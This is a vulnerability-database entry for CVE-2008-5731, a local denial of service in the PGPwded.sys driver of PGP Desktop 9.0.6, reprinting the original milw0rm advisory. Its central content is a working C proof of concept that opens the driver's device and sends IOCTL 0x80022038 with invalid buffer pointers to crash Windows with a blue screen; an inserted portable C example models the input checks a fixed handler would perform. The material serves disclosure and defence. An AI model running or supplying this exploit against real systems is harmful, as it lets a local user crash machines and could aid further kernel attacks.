PGP Desktop PGPwded.sys Driver Local Denial of Service Vulnerability

Vulnerability ID: 1117127    Vulnerability type: Resource management error
Published: 2008-12-23    Updated: 2009-01-29
CVE: CVE-2008-5731    CNNVD ID: CNNVD-200812-455
Platform: Windows    CVSS score: 4.9
|Vulnerability sources
https://www.exploit-db.com/exploits/7556
https://cxsecurity.com/issue/WLB-2008120054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-455
|Vulnerability details
PGP Desktop is a full-featured encryption product that encrypts files, folders, e-mail and instant messaging. The PGPwded.sys driver shipped with PGP Desktop does not properly validate user-supplied IOCTL input (control code 0x80022038); a local user can submit a malformed request to the driver and crash the system with a blue screen (BSOD).
|Exploit (EXP)
--------------------------[PGP Desktop 9.0.6 Denial Of Service]--------------->


Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Profile: http://evilcry.netsons.org
Website: http://evilfingers.com/

Release Date: 23/12/2008

+-------------------------------------------------+
Product: PGP Desktop 9.0.6 [Build 6060] (other versions could be affected)
Affected Component: PGPwded.sys
Category: Local Denial of Service (BSOD)
          (untested) Local Privilege Escalation
+-------------------------------------------------+



--------------------------[Details]--------------->

PGP Desktop's PGPwded.sys driver does not sanitize user-supplied input (IOCTL),
and this leads to a driver collapse that propagates through the system as a BSOD.

Affected IOCTL is 0x80022038

+-------------------------------------------------+
 Device Type: Custom Device Type: 0x8002, 32770
 Transfer Type: METHOD_BUFFERED (0x0, 0)
 Access Type: FILE_ANY_ACCESS (0x0, 0)
 Function Code: 0x80E, 2062
+-------------------------------------------------+

From Crash Dump Analysis we obtain a KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e);
there could also be the possibility of a Local Privilege Escalation, but I've not
checked it =)
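As an added example that is not part of the advisory or of PGP's code, the following portable C decodes the CTL_CODE fields of the IOCTL listed above and models the length checks a METHOD_BUFFERED dispatch routine must perform before touching a request; the `request` struct and the `pgp_payload` type are simplified stand-ins for the IRP fields and the expected input, not real WDK or PGP types, and the check also covers any other control code sent to the handler.

```c
/* Added example, not part of the advisory: decode the CTL_CODE fields of
 * IOCTL 0x80022038 and model the validation a METHOD_BUFFERED handler needs.
 * Portable C; request and pgp_payload are stand-ins, not real WDK/PGP types. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PGP_IOCTL 0x80022038u   /* control code named in the advisory */
#define METHOD_BUFFERED 0u

typedef struct { uint32_t device_type, access, function, method; } ioctl_fields;

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
ioctl_fields decode_ioctl(uint32_t code) {
    ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Stand-in for the IRP fields a METHOD_BUFFERED handler consults. */
typedef struct {
    uint32_t code;
    void    *system_buffer;   /* AssociatedIrp.SystemBuffer; NULL when both lengths are 0 */
    size_t   in_len, out_len; /* Parameters.DeviceIoControl.{Input,Output}BufferLength */
} request;

typedef struct { uint32_t value; } pgp_payload;   /* hypothetical expected input */

enum { ST_SUCCESS, ST_INVALID_DEVICE_REQUEST, ST_INVALID_PARAMETER, ST_BUFFER_TOO_SMALL };

/* The PoC sends both lengths as 0, so SystemBuffer is NULL: a handler that reads it
 * without these checks faults in kernel mode (KERNEL_MODE_EXCEPTION_NOT_HANDLED). */
int handle_ioctl(const request *r) {
    ioctl_fields f = decode_ioctl(r->code);
    if (r->code != PGP_IOCTL || f.method != METHOD_BUFFERED)
        return ST_INVALID_DEVICE_REQUEST;
    if (r->system_buffer == NULL || r->in_len < sizeof(pgp_payload))
        return ST_INVALID_PARAMETER;
    if (r->out_len < sizeof(pgp_payload))
        return ST_BUFFER_TOO_SMALL;
    pgp_payload *p = (pgp_payload *)r->system_buffer;  /* safe to touch only now */
    p->value += 1;                                     /* placeholder for real work */
    return ST_SUCCESS;
}

int main(void) {
    ioctl_fields f = decode_ioctl(PGP_IOCTL);
    request bad = { PGP_IOCTL, NULL, 0, 0 };   /* shape of the PoC's request */
    printf("type=0x%X access=%u function=0x%X method=%u -> status %d\n",
           f.device_type, f.access, f.function, f.method, handle_ioctl(&bad));
    return 0;
}
```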

+--------------------------------------------------------------------------------------------+
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 *
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	HANDLE hDevice;
	DWORD Dummy;	/* receives the byte count reported by DeviceIoControl */

	system("cls");
	printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");

	/* Open the driver's device object; the IOCTL is defined with
	 * FILE_ANY_ACCESS, so no specific access rights are requested. */
	hDevice = CreateFileA("\\\\.\\PGPwdef",
						0,
						FILE_SHARE_READ | FILE_SHARE_WRITE,
						NULL,
						OPEN_EXISTING,
						0,
						NULL);

	if (hDevice == INVALID_HANDLE_VALUE)
	{
		printf("\n Unable to Open PGPwded Device Driver\n");
		return EXIT_FAILURE;
	}

	/* Send IOCTL 0x80022038 with zero-length buffers; the driver uses the
	 * request without validating it and the system bugchecks. */
	DeviceIoControl(hDevice, 0x80022038, (LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Dummy, (LPOVERLAPPED) NULL);

	CloseHandle(hDevice);
	return EXIT_SUCCESS;
}

+--------------------------------------------------------------------------------------------+



Special Thanks:
To _g_ of orange-bat that developed IOCTL-Proxy a really effective IOCTL Fuzzer
http://www.orange-bat.com/code/ioctl-proxy.zip



Regards,
Giuseppe 'Evilcry' Bonfa'



Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based
on currently available information. Use of the information constitutes acceptance for use
in an AS IS condition. There are no representations or warranties, either express or implied,
by or with respect to anything in this document, and the author shall not be liable for any implied
warranties of merchantability or fitness for a particular purpose or for any indirect, special
or consequential damages.

# milw0rm.com [2008-12-23]
|References

Source: SECTRACK, Name: 1021493, Link: http://www.securitytracker.com/id?1021493
Source: BID, Name: 32991, Link: http://www.securityfocus.com/bid/32991
Source: BUGTRAQ, Name: 20081223 PGP Desktop 9.0.6 Denial Of Service - ZeroDay, Link: http://www.securityfocus.com/archive/1/archive/1/499572/100/0/threaded
Source: MILW0RM, Name: 7556, Link: http://www.milw0rm.com/exploits/7556
Source: MISC, Link: http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php
Source: MISC, Link: http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service.php
Source: SREASON, Name: 4811, Link: http://securityreason.com/securityalert/4811
Source: SECUNIA, Name: 33310, Link: http://secunia.com/advisories/33310
Source: OSVDB, Name: 50914, Link: http://osvdb.org/50914